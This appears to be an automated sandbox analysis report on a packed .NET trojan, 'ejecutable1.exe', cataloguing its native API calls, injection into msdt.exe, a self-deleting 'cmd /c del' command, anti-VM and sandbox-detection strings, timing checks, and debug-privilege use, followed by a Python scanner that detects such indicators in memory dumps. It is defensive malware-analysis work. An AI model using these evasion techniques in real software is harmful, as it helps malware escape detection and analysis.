Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C55C 2_2_0041C55C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089E0C6 2_2_0089E0C6
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008CD005 2_2_008CD005
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A3040 2_2_008A3040
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008B905A 2_2_008B905A
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089E2E9 2_2_0089E2E9
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00941238 2_2_00941238
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089F3CF 2_2_0089F3CF
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008C63DB 2_2_008C63DB
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A2305 2_2_008A2305
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A7353 2_2_008A7353
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008EA37B 2_2_008EA37B
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008B1489 2_2_008B1489
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008D5485 2_2_008D5485
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008BC5F0 2_2_008BC5F0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A351F 2_2_008A351F
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A4680 2_2_008A4680
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008AE6C1 2_2_008AE6C1
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00942622 2_2_00942622
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00F57447 2_2_00F57447
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02641238 4_2_02641238
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259E2E9 4_2_0259E2E9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A7353 4_2_025A7353
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025EA37B 4_2_025EA37B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A2305 4_2_025A2305
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025C63DB 4_2_025C63DB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259F3CF 4_2_0259F3CF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B905A 4_2_025B905A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A3040 4_2_025A3040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025CD005 4_2_025CD005
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259E0C6 4_2_0259E0C6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02642622 4_2_02642622
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025AE6C1 4_2_025AE6C1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A4680 4_2_025A4680
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D57C3 4_2_025D57C3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025AC7BC 4_2_025AC7BC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0262579A 4_2_0262579A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B1489 4_2_025B1489
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D5485 4_2_025D5485
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A351F 4_2_025A351F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025BC5F0 4_2_025BC5F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02653A83 4_2_02653A83
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025C7B00 4_2_025C7B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259FBD7 4_2_0259FBD7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0262DBDA 4_2_0262DBDA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0264CBA4 4_2_0264CBA4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025AC85C 4_2_025AC85C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025C286D 4_2_025C286D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0263F8EE 4_2_0263F8EE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02625955 4_2_02625955
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B69FE 4_2_025B69FE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A29B2 4_2_025A29B2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0264098E 4_2_0264098E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025BEE4C 4_2_025BEE4C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D2E2F 4_2_025D2E2F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025CDF7C 4_2_025CDF7C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B0F3F 4_2_025B0F3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025ACD5B 4_2_025ACD5B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D0D3B 4_2_025D0D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0263FDDD 4_2_0263FDDD
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025E373B appears 238 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0260F970 appears 81 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0259DF5C appears 107 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0259E2A8 appears 38 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025E3F92 appears 108 times
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: String function: 0089DF5C appears 50 times
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: String function: 008E3F92 appears 43 times
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: String function: 008E373B appears 81 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004185D0 NtCreateFile, 2_2_004185D0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00418680 NtReadFile, 2_2_00418680
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00418700 NtClose, 2_2_00418700
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004187B0 NtAllocateVirtualMemory, 2_2_004187B0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004186FA NtClose, 2_2_004186FA
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004187AA NtAllocateVirtualMemory, 2_2_004187AA
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008900C4 NtCreateFile,LdrInitializeThunk, 2_2_008900C4
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00890048 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00890048
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00890078 NtResumeThread,LdrInitializeThunk, 2_2_00890078
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk, 2_2_008907AC
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088F9F0 NtClose,LdrInitializeThunk, 2_2_0088F9F0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088F900 NtReadFile,LdrInitializeThunk, 2_2_0088F900
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_0088FAD0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk, 2_2_0088FAE8
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FBB8 NtQueryInformationToken,LdrInitializeThunk, 2_2_0088FBB8
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_0088FB68
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FC90 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_0088FC90
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FC60 NtMapViewOfSection,LdrInitializeThunk, 2_2_0088FC60
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FD8C NtDelayExecution,LdrInitializeThunk, 2_2_0088FD8C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_0088FDC0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FEA0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_0088FEA0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_0088FED0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FFB4 NtCreateSection,LdrInitializeThunk, 2_2_0088FFB4
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008910D0 NtOpenProcessToken, 2_2_008910D0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00890060 NtQuerySection, 2_2_00890060
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008901D4 NtSetValueKey, 2_2_008901D4
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089010C NtOpenDirectoryObject, 2_2_0089010C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00891148 NtOpenThread, 2_2_00891148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025900C4 NtCreateFile,LdrInitializeThunk, 4_2_025900C4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025907AC NtCreateMutant,LdrInitializeThunk, 4_2_025907AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_0258FAD0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk, 4_2_0258FAE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk, 4_2_0258FAB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FB50 NtCreateKey,LdrInitializeThunk, 4_2_0258FB50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_0258FB68
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk, 4_2_0258FBB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F900 NtReadFile,LdrInitializeThunk, 4_2_0258F900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F9F0 NtClose,LdrInitializeThunk, 4_2_0258F9F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_0258FED0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FFB4 NtCreateSection,LdrInitializeThunk, 4_2_0258FFB4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk, 4_2_0258FC60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_0258FDC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FD8C NtDelayExecution,LdrInitializeThunk, 4_2_0258FD8C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590048 NtProtectVirtualMemory, 4_2_02590048
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590078 NtResumeThread, 4_2_02590078
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590060 NtQuerySection, 4_2_02590060
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025910D0 NtOpenProcessToken, 4_2_025910D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02591148 NtOpenThread, 4_2_02591148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259010C NtOpenDirectoryObject, 4_2_0259010C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025901D4 NtSetValueKey, 4_2_025901D4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FA50 NtEnumerateValueKey, 4_2_0258FA50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FA20 NtQueryInformationFile, 4_2_0258FA20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FBE8 NtQueryVirtualMemory, 4_2_0258FBE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F8CC NtWaitForSingleObject, 4_2_0258F8CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F938 NtWriteFile, 4_2_0258F938
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02591930 NtSetContextThread, 4_2_02591930
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FE24 NtWriteVirtualMemory, 4_2_0258FE24
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FEA0 NtReadVirtualMemory, 4_2_0258FEA0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FF34 NtQueueApcThread, 4_2_0258FF34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FFFC NtCreateProcessEx, 4_2_0258FFFC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC48 NtSetInformationFile, 4_2_0258FC48
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590C40 NtGetContextThread, 4_2_02590C40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC30 NtOpenProcess, 4_2_0258FC30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC90 NtUnmapViewOfSection, 4_2_0258FC90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FD5C NtEnumerateKey, 4_2_0258FD5C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02591D80 NtSuspendThread, 4_2_02591D80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_001185D0 NtCreateFile, 4_2_001185D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_00118680 NtReadFile, 4_2_00118680
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_00118700 NtClose, 4_2_00118700
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_001187B0 NtAllocateVirtualMemory, 4_2_001187B0
Sample file is different than original file name gathered from version info
Source: ejecutable1.exe, 00000000.00000002.406383630.0000000001016000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable1.exe
Source: ejecutable1.exe, 00000000.00000002.405909286.00000000007A4000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ejecutable1.exe
Source: ejecutable1.exe, 00000000.00000002.406092250.0000000000C80000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable1.exe
Source: ejecutable1.exe, 00000002.00000002.443196696.0000000001016000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
Source: ejecutable1.exe, 00000002.00000003.441170731.00000000028D0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs ejecutable1.exe
Source: ejecutable1.exe, 00000002.00000002.442687115.0000000000B00000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable1.exe
PE file contains strange resources
Source: ejecutable1.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: 76F90000 page execute and read and write (2 occurrences)
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: 76E90000 page execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76E90000 page execute and read and write
Source: ejecutable1.exe Virustotal: Detection: 36%
Source: ejecutable1.exe ReversingLabs: Detection: 13%
Source: ejecutable1.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ejecutable1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\ejecutable1.exe 'C:\Users\user\Desktop\ejecutable1.exe'
Source: C:\Users\user\Desktop\ejecutable1.exe Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
Source: C:\Users\user\Desktop\ejecutable1.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/0@11/8
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ejecutable1.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: ejecutable1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ejecutable1.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: ejecutable1.exe, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_0027EC70 push eax; retn 0027h 0_2_0027EC79
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA44FA push ds; iretd 0_2_00DA44FB
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B87C push eax; ret 2_2_0041B882
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B812 push eax; ret 2_2_0041B818
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B81B push eax; ret 2_2_0041B882
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415B53 push ds; ret 2_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415B1A push ds; ret 2_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415CE2 push 81CAEFA2h; retf 2_2_00415CE9
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415F6D push ss; ret 2_2_00415F74
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B7C5 push eax; ret 2_2_0041B818
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259DFA1 push ecx; ret 4_2_0259DFB4
Source: initial sample Static PE information: section name: .text entropy: 6.99789102279

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
Deletes itself after installation
Source: C:\Windows\SysWOW64\cmd.exe File deleted: c:\users\user\desktop\ejecutable1.exe
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ejecutable1.exe PID: 788, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ejecutable1.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ejecutable1.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480 Thread sleep time: -45730s >= -30000s
Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1348 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2908 Thread sleep time: -50000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Users\user\Desktop\ejecutable1.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ejecutable1.exe Thread delayed: delay time: 45730
Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.408183204.00000000002C7000.00000004.00000020.sdmp Binary or memory string: @z.SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000003.00000000.463438478.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000003.00000000.408138486.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000003.00000000.413770462.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
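The sandbox and VM indicators listed in this section (SBIEDLL.DLL, KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME, the VMware adapter and VMware Tools strings) were recovered from the first-stage .NET process's memory, where managed string literals are stored as UTF-16LE rather than ASCII. The following is an added example, not code from the report or from Joe Sandbox: a scanner that looks for these indicators in a memory dump in both encodings, so that a dump of a managed process is not missed by an ASCII-only search. The indicator strings are taken from this page; the category names, the constructed sample dump and the choice of "VMware Tools" as the substring to match are this example's own assumptions.

```python
import re

# Indicators quoted from this report's anti-sandbox / anti-VM evidence lines.
# Category names are the example's own, not the report's.
INDICATORS = {
    "sandboxie": [b"SbieDll.dll"],
    "wine":      [b"wine_get_unix_file_name"],
    "vmware":    [b"VMware SVGA II", b"VMware Tools"],
}


def _patterns(indicator):
    """Case-insensitive regexes for one indicator in ASCII and in UTF-16LE.

    The UTF-16LE form interleaves a NUL after every ASCII byte, which is how a
    .NET System.String literal sits in process memory.
    """
    ascii_pat = re.escape(indicator)
    utf16_pat = b"".join(re.escape(bytes([c])) + b"\x00" for c in indicator)
    return [("ascii", re.compile(ascii_pat, re.I)),
            ("utf16", re.compile(utf16_pat, re.I))]


def scan(dump):
    """Return {category: [(offset, encoding, indicator), ...]} for every hit in dump."""
    hits = {}
    for category, indicators in INDICATORS.items():
        for ind in indicators:
            for enc, pat in _patterns(ind):
                for m in pat.finditer(dump):
                    hits.setdefault(category, []).append((m.start(), enc, ind.decode()))
    return hits


def _utf16(s):
    return s.encode("utf-16-le")


# Constructed sample dump (not a real memory capture): an ASCII export-name check
# as the report shows it, followed by two managed UTF-16LE literals, with filler.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME\x00"
    + b"\x90" * 8
    + _utf16("SbieDll.dll") + b"\x00\x00"
    + _utf16("VMware SVGA II")
    + b"\xcc" * 4
    + b"harmless text"
)

if __name__ == "__main__":
    for category, found in scan(SAMPLE_DUMP).items():
        for offset, enc, ind in found:
            print(f"{category:10s} {enc:5s} @0x{offset:04x} {ind}")
```

The export-name check (wine_get_unix_file_name) is matched case-insensitively because the report shows it upper-cased, while the Sandboxie and VMware literals are only found once the UTF-16LE form is tried; running the scanner over a dump with only the ASCII patterns would report the Wine check and nothing else.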

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\ejecutable1.exe Process token adjusted: Debug
Contains functionality to read the PEB
